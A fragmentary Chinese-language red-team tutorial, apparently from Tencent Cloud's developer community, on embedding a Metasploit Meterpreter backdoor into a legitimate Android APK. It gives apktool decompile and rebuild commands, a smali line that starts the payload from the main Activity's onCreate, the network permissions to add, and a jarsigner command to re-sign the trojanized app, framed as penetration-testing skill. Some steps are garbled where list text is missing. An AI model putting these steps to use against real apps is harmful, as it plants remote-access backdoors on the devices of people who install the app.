作者:Joff Thyer
分类:移动安全/红队技术
随着移动应用的普及,Android平台因其开放性成为安全研究的重点目标。本文将演示如何通过技术手段将Meterpreter后门植入合法APK文件。
Android应用采用Java编写,最终编译为DEX字节码格式。通过以下工具链实现APK修改:
apktool d payload.apk
apktool d target_app.apk
android.intent.action.MAIN
的Activity)onCreate()
方法插入启动代码:invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V从原始payload提取所需权限:
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
apktool b modified_app -o unsigned.apk
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore debug.keystore unsigned.apk androiddebugkey
作者开发了Python工具android_embedit.py
实现流程自动化,特点包括:
移动应用安全测试已成为渗透测试必备技能,掌握APK修改技术对红队评估具有重要价值。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。